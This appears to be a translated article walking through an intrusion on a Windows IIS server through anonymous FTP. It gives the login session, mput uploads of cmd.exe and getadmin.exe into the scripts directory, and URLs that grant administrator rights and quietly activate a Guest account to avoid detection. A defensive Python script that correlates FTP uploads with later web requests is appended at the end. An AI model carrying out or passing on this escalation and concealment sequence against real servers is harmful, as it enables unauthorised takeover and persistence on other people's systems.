Study on the risks of allowing anonymous login on a Windows FTP server

Source: Internet
Author: User
Network administrators who lack security awareness often configure a Windows server by enabling only the Web server and installing some common patches, and then consider the server safe. In fact, this is not the case. If the administrator overlooks the danger of anonymous FTP login, a serious vulnerability may result. (For more information about this risk, see my article "Association on www.apache.org intrusion".) Let's take a practical example to see the danger of anonymous login.

From a command shell, we can start the FTP login (assume the host is 192.168.0.1):
ftp 192.168.0.1
Connected to 192.168.0.1
220 wyztc Microsoft FTP Service (Version 3.0).
User (192.168.0.1:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: (enter anonymous, guest@, or guest)
The process is as follows (in the original, user input was shown in bold). First, the IP address of the host is specified for the anonymous login, and the FTP client connects to it. In the third line, 220 indicates that the connection succeeded, and wyztc is the NetBIOS name of the host. If you have some understanding of Windows NT/2000, you will know that the host must therefore have an account named IUSR_machinename (here, iusr_wyztc), the general account under which ordinary visitors browse this host. Then enter anonymous as the user name and anonymous as the password to log on!

The first thing to do after logging on is to use cd to change directory, which is the most difficult step. If you can successfully enter the cgi-bin or scripts directory, you will probably be able to get the highest permissions on the entire system. Here we are lucky and have successfully changed into the scripts directory. Next we need to upload some files to this directory (assume that all the files needed below are placed in D:\hacker):

ftp> mput D:\hacker\cmd.exe
ftp> mput D:\hacker\getadmin.exe
ftp> mput D:\hacker\gasys.dll

After the uploads are reported as successful, you can switch to the browser and enter the following URL: http://192.168.0.1/scripts/getadmin.exe?iusr_wyztc
After more than 10 seconds, the browser displays:
CGI Error
At this point it is very likely that the iusr_wyztc account has been added to the Administrators group, which means that every user who accesses 192.168.0.1 is an administrator. Since access through the browser now runs as an administrator, we can use net user to add a new account. To prevent the administrator from discovering it, it is best to activate the Guest account!

http://192.168.0.1/scripts/cmd.exe?/C%20C:\winnt\system32\net.exe user guest /active:yes
http://192.168.0.1/scripts/getadmin.exe?guest

In this way, a guest user with the permissions of the Administrators group is successfully added to the host, and it is difficult for the administrator to notice it, which makes this highly risky. In addition, once Administrator permission has been obtained, backdoors can be placed, so the host is no longer secure.
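On the defender's side, the sequence described above leaves a trace in two logs: an anonymous FTP upload of an executable into a script directory, followed by a web request for the same file. The following Python sketch is an added example, not part of the original article; the log lines, client addresses and simplified field layout are constructed, and it assumes the FTP root and the web root expose the same /scripts path.

```python
import re
from datetime import datetime, timedelta

# Constructed sample logs. Assumed simplified W3C extended field order:
# date time c-ip cs-username cs-method cs-uri-stem sc-status
# Assumes the FTP root and the web root expose the same /scripts path.
FTP_LOG = """\
2001-03-01 10:00:02 198.51.100.5 anonymous [1]created /scripts/cmd.exe 226
2001-03-01 10:00:09 198.51.100.5 anonymous [1]created /scripts/getadmin.exe 226
2001-03-01 10:01:00 198.51.100.7 alice [2]created /pub/report.txt 226
2001-03-01 10:01:30 198.51.100.8 anonymous [3]created /scripts/tool.exe 550
"""
WEB_LOG = """\
2001-03-01 10:02:30 198.51.100.5 - GET /scripts/getadmin.exe 502
2001-03-01 10:05:00 198.51.100.9 - GET /default.htm 200
"""

ANON_USERS = {"anonymous", "ftp"}
EXEC_DIRS = ("/scripts/", "/cgi-bin/")
EXEC_EXTS = (".exe", ".dll", ".bat", ".cmd", ".com")

def parse(log):
    """Yield one dict per well-formed record; skip directives and short lines."""
    for line in log.splitlines():
        f = line.split()
        if line.startswith("#") or len(f) < 7 or not f[6].isdigit():
            continue
        yield {"ts": datetime.strptime(f[0] + " " + f[1], "%Y-%m-%d %H:%M:%S"),
               "ip": f[2], "user": f[3].lower(),
               "method": re.sub(r"^\[\d+\]", "", f[4]).lower(),  # drop session id
               "uri": f[5].lower(), "status": int(f[6])}

def anonymous_exec_uploads(ftp_log):
    """Successful anonymous uploads of executable files into script directories."""
    return [e for e in parse(ftp_log)
            if e["user"] in ANON_USERS and e["method"] in ("created", "stor")
            and 200 <= e["status"] < 300
            and e["uri"].startswith(EXEC_DIRS) and e["uri"].endswith(EXEC_EXTS)]

def requested_after_upload(ftp_log, web_log, window=timedelta(hours=24)):
    """Web requests for a file that anonymous FTP uploaded within the window."""
    uploads = {e["uri"]: e for e in anonymous_exec_uploads(ftp_log)}
    return [(r["uri"], uploads[r["uri"]]["ip"], r["ip"], r["status"])
            for r in parse(web_log) if r["uri"] in uploads
            and timedelta(0) <= r["ts"] - uploads[r["uri"]]["ts"] <= window]

if __name__ == "__main__":
    for hit in requested_after_upload(FTP_LOG, WEB_LOG):
        print("ALERT uploaded-then-requested:", hit)
```

Any result from anonymous_exec_uploads is already worth an alert on its own, because it shows that the anonymous account has write access to a directory the web server will execute from.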
